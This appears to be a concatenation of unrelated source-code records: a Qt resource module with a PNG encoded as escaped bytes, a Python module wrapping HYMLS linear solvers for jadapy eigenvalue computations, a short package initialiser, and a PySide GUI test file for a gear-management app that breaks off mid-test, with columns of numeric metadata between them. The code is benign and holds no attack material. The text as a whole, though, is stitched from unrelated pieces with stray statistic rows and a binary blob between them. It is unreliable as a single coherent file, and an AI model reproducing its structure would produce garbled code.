\xd00\x07\xa8\x22`\x01\x08\x1f\xd6\x0d#\x89\xc8\xd5\xb0Y\x01\x1bcV\x03h)e(\xb7\x17_5\xc6\xdc\xbd}\xfb\xf6\xbd\xf9\xef\xd7\xaf_\xbf(\x93\xc9\xdcJ\xf2!\x02\xcdEt\x88\xa4r\x9fwutt<\x09\xe0\xd0Y\x017\xe6Q\x92\xcd\x15\xad\xb0l+\x9c\x06\xf0?+\x1d\x82A\x1aV Y\x05\xa0\x19\xc0\x12\x00M$]\x00\xae$\xe7,\xc0\x00\xae\xae\xa4HY\xe9\xa7\x03\x05`\x01`\xdb\xb6m\xc7\x00l\x8a\xc7\xe3\x96\xc6<\x01I\x90\x04\xc2f\xbb\x03\xc6\x01\x9c\xb0\xd6\x9e4@\x9a\xc6\x1c\x05\xd0X\x08\x98\xe4\x1d$\xdb\xcb\xd9'\x19J:\x0a\xe0O$\x9f\x05\xf0z\xfb\xc0\xc0\xf1.\xc9\xe6\xc7$\x93Iott\xb4\xd1\xf3\xbc\x95\x00>\x0bk\x134f5\x81\xea3\x80%5\x15\xb4\x92\x229\x12H6\xb6\xb6\xb6z\xfb\xf6\xed\x9b\x9e\xb9$\xa7\xa6\xa6\xfe\xe0y\xde\xc7\x01\x8cK:b\x8cy\x0f\xc0\x91\x1c\xd8\x13MMM'\xbb\xbb\xbb33\xd5\xfa\xbe_o\x8c\xf96\xca\x82\xc5\xb4\xa4\xed$\x1f\xec\xeb\xeb{\xbd\xd8\xb8\x9c\x8d\x91\xdc\xf3B[[\xdb#\xb5\xb5\xb5k\x8c1\xb7\x9c\xc9h<\x1e\xdf@\xf2\xc7\x15DxD\xd2\xc3\x92R\x8e\xe3\x0c\xcf\x9b7o\xfa\xd4\xa9Svll\xcc655\xd9\xc1\xc1A\xab\x82hW\x22\xf1x\xfc6\x92\xdd\xa5l\x93\xb4\xd6\xda\xdfe2\x99o\xee\xd8\xb1\xe3\xd4\x5c\xf4\x17Ja\x86\x0f\x96\xcdpv\xdc\x12\x02\x8f\x83<a\xad}g||\xfc\xdf\xc6\x98w\x9a\x9b\x9b\x87%\xbd\x1b\x8b\xc5\xde\xbd\xe1\x86\x1bFI\x9ep\x1c'\xa8\xa9\xa9\x09*\xa0\x987\x97\x0c2\x00\xc0\xbe\x22\xe9[\xe7\x03\x16(\xa0\x96\x89D\xe2Rk\xed\xdf\x01,\xaaxr6\xf4\x85\xc1\x00\x80I\x00GH\x1e\x94\xb4\x8b\xe4\xcb$wOLL\x8c\xed\xdc\xb9\xf3\xf4\xccm\x90+V{\x08\x5cV,\xbf$\xa7B\x867\xa5\xb6\xa7\xfa\xce\x07,P\xd0\x87\xfb\xfa\xfa\x0e\x02\xf8\xb3!+^\x8e\xca\x81\xcc?9\xa9\x06\xb0\x0c@\x94\xe4\x03\x92\xba%\xfd\xd5\xf3\xbc\x07\xda\xdb\xdbW&\x93Io\x06\x98\xa5\x00\x96\x94\x00\x0bI{\xc6F\xc6\x86\xce\x17\xecY\x80%\x89\xe4#V:\x80J\x89D\xa9`|\x18\x04BZe\x8c\xf9\x91\xeb\xba\x7f<z\xf4h\xa2\xb3\xb3\xb3\xaa`\x5c\x13\xcb\xf4o\x00/\xbd\xf1\xc6\x1b\x19\x5c\x00)lK\xe8\xeb\xeb\xdb\xef\xfb\xfe}\x8e\xc3M\x10\x97h\xc6\xfbs\x06\x9fE\x06\x92\xd7\x00\xf8efb\xe2\xae\x8d\x1b7\xf6tuuYcLm.\x8d\xa5\x82w\xb8\x12;$M4\x1a\x9d_1`\x00H\xa5R\xdb\xe2\xf1\xf8\xd7\x00<D\xb2\x05\xc
0|I\x1e.\x80(\x0b\xba\x09\x8e\xf3\xd8\xd0\xd0\xd0[\x00\xde\x91d\xcb\x95JVRM\x01D\xa3\xd1E\x8e\xe3\xdcea\x1d\x14\xd9\x98\xb3f\xb0\xbf\xbf\x7f\xa0\xbd\xbd}o$\x12\xb9\x95\xe4\xe7\x00\xb4\x90\xac\x05P\x9d\x03\xefb\x16\xda6\x07\xd0+\x00\xdcK\xf2\xbb\xbe\xef\xbf\x0f\xd2B2%\xa6-\xafP\xfd\xc5\x92~fhf\x9c\x12\x0a\x82W\xae\xef\xb6\xb5\xb5E\xea\xeb\xeb/G\x18~R\xc6\xb4I\xba\xd2\x90\xcb@.\x22\xe5I\x8c\x00\xf0$E\xe6\x12\x04I\xc3\x8e\xe3\xb4\x06A\xd0@\xf2\xf5\x5c@?\xea \x00+\xed\xa9\xa9\xa9\xf9\xcc\xe6\xcd\x9b?(\xa53\x16\x8b\xb5\x90|\x15@U\xb11e\xf7\xe8\xae]\xbb\xa6\x01\xbc\x99{~\xeb\xfb\xbe\x9b\x09\x82&\xc7q\x96\x1acV\x00\xbaL\xd2\xe5\xb9\xac-\x01\xb0\x14@m9\xbd\xc6\x98K\xac\xb5\xd7\x00x\x91\xe4\xdb$W\xcf\x16|\x010\xe4U\xe3\xe3\xe3I\x92\xbf\x9e+\xa9\xa9\x08\xf0\xc6\x8d\x1b\xcd\x96-[\x1c\xcf\xf3\xdc\x05\x0b\x16xA\x10D\x22\x91\x887==\xed\xcd\x9b7o\xa4\xa7\xa7'O\xdbv\x01@2\x99tFGG\x17{\x9e\xd7*\xe96\x92_\x954\xbf\x8cmCrq*\x95\x0a:b\xb1\x1d W\x97\x18\xeb\x00\xb8?\x1e\x8f\xef&\xb9\xf7|\xae\x8b\x5c\x00\xf0}\x7f\xb9\xe38^\x18\x86\x9e\xeb\xba\x910\x0c\x17\xd6\xd7\xd6\xd6\x86@\x9d\xb5\xb6\xc1!\x1b\xac\xb5\xf5\x8e\xe34NNN>\x05`g\xa1\x92\x1c\x93\x1a\x010\x92H$^\xb1\xd6^K\xf2\xba\xb2\x07\x11k-\x00X`3\xa5{P\xa4=\x09\x00\xc9\xab$\xfd$\x1a\x8dn\xf0}\xff\x9f\xa9Tj\xf2\x9c\x01\x1bc\xbe\xa1l\xaf\xbc\xc8Z[o\x0cj%S\xeb\x00\xf3\x05D\xf2\x17C$@\xd2\xeb\xec\xec\xdc\xdb\xd3\xd3sr6\x85\x0d\x0d\x0d\x13\xe9tz\xb4\x9caI\x811f\x04\x00\x22\x91\xc8K\xd3\xd3\xd3/\x1bc\xa2\xc5\x82\x94+v\x9dN\xb6\x8d=\x96H$v\x07A\xf0\xde\xe0\xe0\xe0\x07\xf9e\xee8N>\x86E\x85\x92\xd0\x11\x8b=D\xc7\xd9 
Y#e\x0bE\x09\xe6\xf3\x01\x10\xdeoLd\x8b\xeb\xba\xe9\xad[\xb7N\x03@4\x1a5\x8e\xe3\xd4Yk\xdb\x0c\xf9\xb4\x80K\x8a\x1a\xcd\x228\x98\x09\x825CCCc\x00\x10\x8b\xc5n1\xc6<-iaI\x87\xb3\xcc\xeb}\x03l\xb5\xc0\x80\xa4\xb7$\x9d\x00\x10\x18c>\x01`\x0b\x80\xa2m\x94\x92\xe0\xfb\xfe\xc7\x1cr\x08\x86+\xca\xed\x8e\x5c\xaa\x8f\x01\xf8\x15\x80\x17\x00\xa4\xad\xb5VR\xad1\xe6Z\x12wB\xb8\xa2\xdcE\x82\xb5\xf6\xc9T*uo~?vvvVe&'7\xc1\x98\xdb%\x95-\xa69\xe0\x01\x80\xc3\x00\x86\x09\x8c\x0b\xa8\x01\xf0)d\xf7|q\xc0\x00\x10\x8f\xc7\xbb\x08l\x10\x10)g,\x0f\x5c\xc0I\x00\xc7s\xd7>\xb5\x00.*\xb5:\x0a\xe6\x0d\x03\xf8B\x7f\x7f\xff\xee\xc2w\xbe\xef\xaf4\xc6<CrM\xfe\x86\xa2\x12?f9\xc0\x14\x953\xed\xd9q\x9c\xa7\x04\xfc\x8ddE\xbf\x16\xe4\xd4.$\xb0\x0c\xd2\x0a\x00\x17\x15|_\xdcA\x83\xe3\x00\x9e\x9c\x09\x16\x00R\xa9\xd4\x01\x00\xdf\x07\xb0\x1b@P\xa9\x1f\xb3\x1c`\xca\x03\xee\xed\xed=L\xf2\x1e\x0b\xfb\x1b\x00\xa7+e\x10\xaa\x04d\xfe\x93|\xcdZ\xfc\xa0\xaa\xaa\xea\xe7\xc5\xc6\xf6\xf7\xf7\xbf\x18\x86\xe1\x1d\x00\x1egv\xa9^0!faZ\x1d\x1d\x1dWH\xba\x93\xe4\x8d\x90\xaeD\x8e\xb5\x9cK\xe3\xcb/o\x92\x87$\xed\x94\xf4\xfb\xea\xea\xea\xe7{zz\xa6\xca\xcdmoo_\x12\x89D\xbeH\xf2K\x92\xae#P\x7f\x9e~L\x0188+\xb5\xec\xe8\xe8h\x94\xd4\x0e\xe0z\x92-\xfap\xc9\xd6\x92\x8c(\xc7{\x0b\xa3_\xa0%\x040\xc9la\x1b\xb6\xd6\xee7\xc6\xbc`\xad\xdd100\xf0\xaf\xb98\xda\xda\xda\xea-^\xbc\xf8:c\xccZ\x00\xd7KjA\x96\xcdUU\xa8b\x8a\xe4{\x82\xde\x86\xf0\x1a\xc9]%\xb9tGGG\xa3\xb5v\xa51f\xb9\xb5\xf6\x12\x92\x8b\x91\x8d\xf4\x02\x92\xf9CDV\xac\x0d`\xccT\xaeE\xa4i\xed\xb0%\x87\xc30\xdc\x1f\x8b\xc5\xfe\xdb\xd5\xd5u\xce\x94p\xdd\xbau\x0b2\x99\xcc*cL\xab\xa4U$\x97\x13\xb8R\xd9\xfb\xf0\x99d\xe5}\x92\x07 
\x1d\xb0\xd2!#\xed\x87\xe3\xec\x07\xf0f___\xba\xe2\xdf\x8e\x92\xc9\xa4s\xfa\xf4iwbb\x22\x12\x04A\xc4u]'\x0c\xc33I\xf6<\xcf\x86a\x18z\x9e7\x9dN\xa739\x0e~\xc1\xc5\xf7\xfdj\x005$\x1b\xe5\xa8\xc1\x85\xeb\x22\xc8\xd57\xd7\x85\xa4\xa90\x0c\x8f;\x8es<\x0c\xc3\xf1\xc1\xc1\xc1\xa9B*\xfa\x7fv%\xa5K\xb6.\xe84\x00\x00\x00%tEXtdate:create\x002017-03-14T16:16:23-07:00&X7\x8a\x00\x00\x00%tEXtdate:modify\x002017-03-14T16:16:23-07:00W\x05\x8f6\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = "\x00%\x02\xa3\x13$\x00t\x00k\x00_\x00f\x00r\x00a\x00m\x00e\x00w\x00o\x00r\x00k\x00_\x00q\x00t\x00w\x00i\x00d\x00g\x00e\x00t\x00s\x00.\x00o\x00v\x00e\x00r\x00l\x00a\x00y\x00_\x00w\x00i\x00d\x00g\x00e\x00t\x00\x0b\x05U\xfb'\x00s\x00g\x00_\x00l\x00o\x00g\x00o\x00.\x00p\x00n\x00g"
qt_resource_struct = "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00P\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
def qInitResources():
    """Register the embedded resource data (sg_logo.png) with Qt's resource system."""
    QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
    """Unregister the embedded resource data from Qt's resource system."""
    QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 712.571429
| 14,017
| 0.742582
| 3,374
| 14,964
| 3.280676
| 0.271488
| 0.030897
| 0.021953
| 0.010841
| 0.02909
| 0.026922
| 0.018159
| 0.018159
| 0.01572
| 0.01572
| 0
| 0.250034
| 0.006816
| 14,964
| 20
| 14,018
| 748.2
| 0.494752
| 0.009957
| 0
| 0
| 0
| 0.333333
| 0.974946
| 0.97184
| 0
| 0
| 0.00054
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bd6c13b26deb1be96fcbba65c0d6cec0c11c4e64
| 8,265
|
py
|
Python
|
fvm/JadaHYMLSInterface.py
|
erik808/fvm
|
4d10d83dccb2d8ee3f8b2550a39e3179a64b7cb9
|
[
"Apache-2.0"
] | null | null | null |
fvm/JadaHYMLSInterface.py
|
erik808/fvm
|
4d10d83dccb2d8ee3f8b2550a39e3179a64b7cb9
|
[
"Apache-2.0"
] | null | null | null |
fvm/JadaHYMLSInterface.py
|
erik808/fvm
|
4d10d83dccb2d8ee3f8b2550a39e3179a64b7cb9
|
[
"Apache-2.0"
] | null | null | null |
import copy
import HYMLS
from PyTrilinos import Epetra
from jadapy import EpetraInterface
from jadapy import ComplexEpetraInterface
class JadaHYMLSPrecOp(EpetraInterface.Operator):
    """Preconditioner operator that applies ``prec`` and then projects.

    Wraps a HYMLS preconditioner so that, after its inverse is applied,
    the result is passed through ``op.proj`` (presumably the projection
    onto the Jacobi-Davidson search-space complement -- TODO confirm).
    """

    def __init__(self, op, prec):
        # op: operator providing proj(); prec: object exposing ApplyInverse(x, y).
        super().__init__(op)
        self.prec = prec

    def ApplyInverse(self, x, y):
        """Apply the preconditioner to ``x``, project, and store the result in ``y``.

        Returns the Epetra status code from ``y.Update``.
        """
        self.prec.ApplyInverse(x, y)

        # Create a view here because this is an Epetra.MultiVector.
        z = EpetraInterface.Vector(Epetra.View, y, 0, y.NumVectors())
        z = self.op.proj(z)

        # Overwrite y with the projected result (y := 1.0 * z + 0.0 * y).
        return y.Update(1.0, z, 0.0)
class JadaHYMLSInterface(EpetraInterface.EpetraInterface):
    """jadapy solver interface backed by a HYMLS iterative solver (real arithmetic)."""

    def __init__(self, interface, *args, **kwargs):
        super().__init__(interface.map)
        self.interface = interface
        # Shallow copy so per-solve parameter tweaks don't leak back into `interface`.
        self.parameters = copy.copy(interface.parameters)
        self.preconditioned_solve = kwargs.get('preconditioned_solve', False)

    def solve(self, op, rhs, tol, maxit):
        """Solve the correction equation ``op * out = rhs`` with HYMLS.

        A loose 1e-3 tolerance is used when maxit <= 1 (single-iteration
        solves don't get the tight tolerance).
        """
        solver_parameters = self.parameters.sublist('Solver')
        iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
        iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
        # iterative_solver_parameters.set('Maximum Iterations', maxit)

        # Two columns means the rhs carries (real, imag) parts -- solve in complex mode.
        if rhs.shape[1] == 2:
            solver_parameters.set('Complex', True)
        else:
            solver_parameters.set('Complex', False)

        out = EpetraInterface.Vector(rhs)
        epetra_op = EpetraInterface.Operator(op)
        if self.preconditioned_solve:
            epetra_precop = JadaHYMLSPrecOp(op, self.interface.preconditioner)
            solver = HYMLS.Solver(epetra_op, epetra_precop, self.parameters)
        else:
            # Without preconditioning, the operator itself fills the
            # preconditioner slot of the HYMLS solver.
            solver = HYMLS.Solver(epetra_op, epetra_op, self.parameters)
        solver.ApplyInverse(rhs, out)
        return out

    def prec(self, x, *args):
        """Apply the HYMLS preconditioner to ``x`` and return the result."""
        out = EpetraInterface.Vector(x)
        self.interface.preconditioner.ApplyInverse(x, out)
        return out
class ComplexJadaHYMLSPrecOp(EpetraInterface.Operator):
    """Complex-valued variant of JadaHYMLSPrecOp.

    The two columns of the multivector hold the real and imaginary parts.
    """

    def __init__(self, op, prec):
        # op: operator providing proj(); prec: object exposing ApplyInverse(x, y).
        super().__init__(op)
        self.prec = prec

    def ApplyInverse(self, x, y):
        """Apply ``prec`` to ``x``, project, and write the result into ``y`` in place.

        Always returns 0 (Epetra success code).
        """
        self.prec.ApplyInverse(x, y)
        assert x.NumVectors() == 2

        # Create a view here because this is an Epetra.MultiVector.
        y = EpetraInterface.Vector(Epetra.View, y, 0, y.NumVectors())
        y = ComplexEpetraInterface.ComplexVector(y[:, 0], y[:, 1])
        z = self.op.proj(y)
        # Update in place through the view so the caller's y receives the
        # projected value (y := 0 * y + z).
        y *= 0.0
        y += z
        return 0
class ComplexJadaHYMLSInterface(ComplexEpetraInterface.ComplexEpetraInterface):
    """Complex-arithmetic jadapy interface backed by a HYMLS solver.

    Complex vectors are carried as two-column real Epetra multivectors
    (column 0 = real part, column 1 = imaginary part).
    """

    def __init__(self, interface, *args, **kwargs):
        super().__init__(interface.map)
        self.interface = interface
        # Shallow copy so per-solve parameter tweaks don't leak back into `interface`.
        self.parameters = copy.copy(interface.parameters)
        self.preconditioned_solve = kwargs.get('preconditioned_solve', False)

    def solve(self, op, rhs, tol, maxit):
        """Solve ``op * out = rhs`` for a complex rhs; returns a ComplexVector.

        Uses a loose 1e-3 tolerance when maxit <= 1.
        """
        solver_parameters = self.parameters.sublist('Solver')
        iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
        iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
        # iterative_solver_parameters.set('Maximum Iterations', maxit)
        solver_parameters.set('Complex', True)

        # Pack the complex rhs into a two-column real multivector.
        x = EpetraInterface.Vector(rhs.real.Map(), 2)
        y = EpetraInterface.Vector(rhs.real.Map(), 2)
        x[:, 0] = rhs.real
        x[:, 1] = rhs.imag

        epetra_op = ComplexEpetraInterface.Operator(op)
        if self.preconditioned_solve:
            epetra_precop = ComplexJadaHYMLSPrecOp(op, self.interface.preconditioner)
            solver = HYMLS.Solver(epetra_op, epetra_precop, self.parameters)
        else:
            # Without preconditioning, the operator itself fills the
            # preconditioner slot of the HYMLS solver.
            solver = HYMLS.Solver(epetra_op, epetra_op, self.parameters)
        solver.ApplyInverse(x, y)

        # Unpack the two real columns back into a complex vector.
        out = ComplexEpetraInterface.ComplexVector(y[:, 0], y[:, 1])
        return out

    def prec(self, x, *args):
        """Apply the HYMLS preconditioner to a complex vector ``x``."""
        y = EpetraInterface.Vector(x.real.Map(), 2)
        z = EpetraInterface.Vector(x.real.Map(), 2)
        y[:, 0] = x.real
        y[:, 1] = x.imag
        self.interface.preconditioner.ApplyInverse(y, z)
        out = ComplexEpetraInterface.ComplexVector(z[:, 0], z[:, 1])
        return out
class ShiftedOperator(object):
    """Linear operator representing ``beta * A - alpha * B``.

    Mirrors the fields of a jadapy operator object so the shifted system
    can be handed to HYMLS independently of the original object.
    """

    def __init__(self, op):
        # Copy every field the solver machinery reads off the wrapped op.
        for attr in ('A', 'B', 'prec', 'Q', 'Z', 'Y', 'H', 'alpha', 'beta'):
            setattr(self, attr, getattr(op, attr))
        self.dtype = self.Q.dtype
        self.shape = self.A.shape

    def matvec(self, x):
        """Return ``(beta * A - alpha * B)`` applied to ``x``."""
        a_part = (self.A @ x) * self.beta
        b_part = (self.B @ x) * self.alpha
        return a_part - b_part
class BorderedJadaHYMLSInterface(EpetraInterface.EpetraInterface):
    """jadapy interface that solves the correction equation via HYMLS bordering.

    Instead of projecting explicitly, HYMLS is given the (Z, Q) border so
    the projected shifted system is solved directly. Note that the default
    for ``preconditioned_solve`` is True here (False in JadaHYMLSInterface).
    """

    def __init__(self, interface, *args, **kwargs):
        super().__init__(interface.map)
        self.interface = interface
        # Shallow copy so per-solve parameter tweaks don't leak back into `interface`.
        self.parameters = copy.copy(interface.parameters)
        self.preconditioned_solve = kwargs.get('preconditioned_solve', True)

    def solve(self, op, rhs, tol, maxit):
        """Solve ``(beta*A - alpha*B) * out = rhs`` with the (Z, Q) border.

        Raises Exception when ``preconditioned_solve`` is False (the
        unpreconditioned bordered path is not implemented). Uses a loose
        1e-3 tolerance when maxit <= 1.
        """
        solver_parameters = self.parameters.sublist('Solver')
        iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
        iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
        # iterative_solver_parameters.set('Maximum Iterations', maxit)

        # Two columns means the rhs carries (real, imag) parts -- solve in complex mode.
        if rhs.shape[1] == 2:
            solver_parameters.set('Complex', True)
        else:
            solver_parameters.set('Complex', False)

        solver_parameters.set('Use Bordering', True)

        out = EpetraInterface.Vector(rhs)
        epetra_op = EpetraInterface.Operator(ShiftedOperator(op))
        if self.preconditioned_solve:
            solver = HYMLS.Solver(epetra_op, self.interface.preconditioner, self.parameters)
            # Border with (Z, Q), recompute the preconditioner, solve, and
            # remove the border again -- this ordering is load-bearing.
            solver.SetBorder(op.Z, op.Q)
            self.interface.preconditioner.Compute()
            solver.ApplyInverse(rhs, out)
            solver.UnsetBorder()
        else:
            raise Exception('Not implemented')
        return out

    def prec(self, x, *args):
        """Apply the HYMLS preconditioner to ``x`` and return the result."""
        out = EpetraInterface.Vector(x)
        self.interface.preconditioner.ApplyInverse(x, out)
        return out
class ComplexBorderedJadaHYMLSInterface(ComplexEpetraInterface.ComplexEpetraInterface):
    """Complex-arithmetic bordered jadapy interface backed by HYMLS.

    Complex vectors are carried as two-column real multivectors
    (column 0 = real, column 1 = imaginary); the Q and Z borders are
    packed the same way, all real columns first.
    """

    def __init__(self, interface, *args, **kwargs):
        super().__init__(interface.map)
        self.interface = interface
        # Shallow copy so per-solve parameter tweaks don't leak back into `interface`.
        self.parameters = copy.copy(interface.parameters)
        self.preconditioned_solve = kwargs.get('preconditioned_solve', True)

    def solve(self, op, rhs, tol, maxit):
        """Solve the shifted complex system with the (Z, Q) border.

        Raises Exception when ``preconditioned_solve`` is False (the
        unpreconditioned bordered path is not implemented). Uses a loose
        1e-3 tolerance when maxit <= 1.
        """
        solver_parameters = self.parameters.sublist('Solver')
        iterative_solver_parameters = solver_parameters.sublist('Iterative Solver')
        iterative_solver_parameters.set('Convergence Tolerance', tol if maxit > 1 else 1e-3)
        # iterative_solver_parameters.set('Maximum Iterations', maxit)
        solver_parameters.set('Complex', True)
        solver_parameters.set('Use Bordering', True)

        # Pack the complex rhs into a two-column real multivector.
        x = EpetraInterface.Vector(rhs.real.Map(), 2)
        y = EpetraInterface.Vector(rhs.real.Map(), 2)
        x[:, 0] = rhs.real
        x[:, 1] = rhs.imag

        # Pack the complex borders Q and Z: the first m columns hold the
        # real parts, the next m the imaginary parts.
        m = op.Q.real.NumVectors()
        Q = EpetraInterface.Vector(rhs.real.Map(), m * 2)
        Q[:, 0:m] = op.Q.real
        Q[:, m:2*m] = op.Q.imag
        Z = EpetraInterface.Vector(rhs.real.Map(), m * 2)
        Z[:, 0:m] = op.Z.real
        Z[:, m:2*m] = op.Z.imag

        epetra_op = ComplexEpetraInterface.Operator(ShiftedOperator(op))
        if self.preconditioned_solve:
            solver = HYMLS.Solver(epetra_op, self.interface.preconditioner, self.parameters)
            # Border, recompute the preconditioner, solve, and remove the
            # border again -- this ordering is load-bearing.
            solver.SetBorder(Z, Q)
            self.interface.preconditioner.Compute()
            solver.ApplyInverse(x, y)
            solver.UnsetBorder()
        else:
            raise Exception('Not implemented')

        # Unpack the two real columns back into a complex vector.
        out = ComplexEpetraInterface.ComplexVector(y[:, 0], y[:, 1])
        return out

    def prec(self, x, *args):
        """Apply the HYMLS preconditioner to a complex vector ``x``."""
        y = EpetraInterface.Vector(x.real.Map(), 2)
        z = EpetraInterface.Vector(x.real.Map(), 2)
        y[:, 0] = x.real
        y[:, 1] = x.imag
        self.interface.preconditioner.ApplyInverse(y, z)
        out = ComplexEpetraInterface.ComplexVector(z[:, 0], z[:, 1])
        return out
| 34.4375
| 92
| 0.638355
| 947
| 8,265
| 5.444562
| 0.102429
| 0.086889
| 0.05896
| 0.048099
| 0.867145
| 0.854732
| 0.834368
| 0.782002
| 0.727308
| 0.727308
| 0
| 0.009305
| 0.245856
| 8,265
| 239
| 93
| 34.58159
| 0.817905
| 0.043436
| 0
| 0.705202
| 0
| 0
| 0.044309
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 1
| 0.104046
| false
| 0
| 0.028902
| 0.00578
| 0.236994
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd7e937b4ff137bcde0aff448164da8005218fdb
| 139
|
py
|
Python
|
dlf/preprocessing/__init__.py
|
scheckmedia/dl-framework
|
8fea39e166fda0ff8fa51696831bf5cb42f3ed10
|
[
"Apache-2.0"
] | null | null | null |
dlf/preprocessing/__init__.py
|
scheckmedia/dl-framework
|
8fea39e166fda0ff8fa51696831bf5cb42f3ed10
|
[
"Apache-2.0"
] | null | null | null |
dlf/preprocessing/__init__.py
|
scheckmedia/dl-framework
|
8fea39e166fda0ff8fa51696831bf5cb42f3ed10
|
[
"Apache-2.0"
] | null | null | null |
from dlf.core.registry import import_framework_modules
from pathlib import Path
# Import every module in this package directory; presumably each module
# registers itself with the dlf framework registry on import -- confirm
# against dlf.core.registry.
import_framework_modules(Path(__file__).parent, __name__)
| 27.8
| 57
| 0.863309
| 19
| 139
| 5.684211
| 0.631579
| 0.277778
| 0.407407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079137
| 139
| 4
| 58
| 34.75
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bda8aef1f8ac24910dc0f79ac38c1e754812694d
| 27,068
|
py
|
Python
|
Tests/tests_gui.py
|
galbrads/Gear_Manager
|
3b8ba0f455130556be21a9dbd43f4e9ae6243be9
|
[
"MIT"
] | null | null | null |
Tests/tests_gui.py
|
galbrads/Gear_Manager
|
3b8ba0f455130556be21a9dbd43f4e9ae6243be9
|
[
"MIT"
] | null | null | null |
Tests/tests_gui.py
|
galbrads/Gear_Manager
|
3b8ba0f455130556be21a9dbd43f4e9ae6243be9
|
[
"MIT"
] | null | null | null |
from __future__ import division
from PySide import QtGui, QtCore
from PySide.QtTest import QTest
import unittest
import tests
import GearManager
import Util
import sys
import os
#
# --- Member Tab tests -------------------------------------------------------------------------------------------------
#
class MemberValueTests(unittest.TestCase):
    """Field-level validation tests for the Member tab.

    Each test enters a member with one field altered and checks whether
    the Add/Update button handler accepts (True) or rejects (False) it.
    """

    def setUp(self):
        """Build a fresh GUI against a brand-new database and select the Member tab."""
        # Reuse the process-wide QApplication if one exists; Qt allows
        # only one instance per process.
        self.app = QtGui.QApplication.instance()
        if self.app is None:
            self.app = QtGui.QApplication(sys.argv)
        self.app.setQuitOnLastWindowClosed(True)
        # Start every test from an empty database file.
        if os.path.isfile(tests.dBName):
            os.remove(tests.dBName)
        self.ui = GearManager.MainUI(tests.dBName)
        # Dismiss the default-due-date dialog shown at startup.
        self.ui.defDueDateWin.okBut.click()
        # Tab index 1 is the Member tab -- TODO confirm against MainUI tab order.
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb = self.ui.tabWid.widget(1)
        self.membA1 = tests.mkMember('A', 1)
        # Clear the current member and member fields
        self.tMemb.nameSearch.clear()
        self.tMemb.clear_fields()

    def test_AddUpdMember(self):
        """A fully valid member is accepted."""
        tests.enterMemberInfo(self, self.membA1)
        self.assertTrue(self.tMemb.Button_addUpdButClick())

    # AddUpd the same member but with a bad local zip code, should fail
    def test_AddUpdMember_shortZip(self):
        self.membA1['zip'] = '1' * 4
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    # Zip field is limited to 5 numbers. Trying to enter 6 will strip it to 5
    # NOTE(review): this test sets 'PermZip' while the other zip tests set
    # 'zip' -- confirm which key tests.mkMember/enterMemberInfo expect.
    def test_AddUpdMember_longZip(self):
        zip_code = '1' * 6
        self.membA1['PermZip'] = zip_code
        tests.enterMemberInfo(self, self.membA1)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.assertEqual(self.tMemb.zipEdit.text(), zip_code[:5])

    def test_AddUpdMember_badZipA(self):
        """A zip made of letters is rejected."""
        self.membA1['zip'] = 'a' * 5
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_bDayToday(self):
        """A birthday equal to today is rejected."""
        self.membA1['Birthday'] = Util.convert_date('Qt2DB', QtCore.QDate.currentDate())
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_bDayInFuture(self):
        """A birthday in the future is rejected."""
        self.membA1['Birthday'] = Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1))
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_no_AT_inEmal(self):
        """An email without an '@' is rejected."""
        self.membA1['Email'] = 'AAA.AAA.com'
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_shortPhone(self):
        """A 9-digit phone number is rejected."""
        self.membA1['Phone'] = '1' * 9
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_longPhone(self):
        """An 11-digit phone number is rejected."""
        self.membA1['Phone'] = '1' * 11
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_lettersInPhone(self):
        """A phone number containing a letter is rejected."""
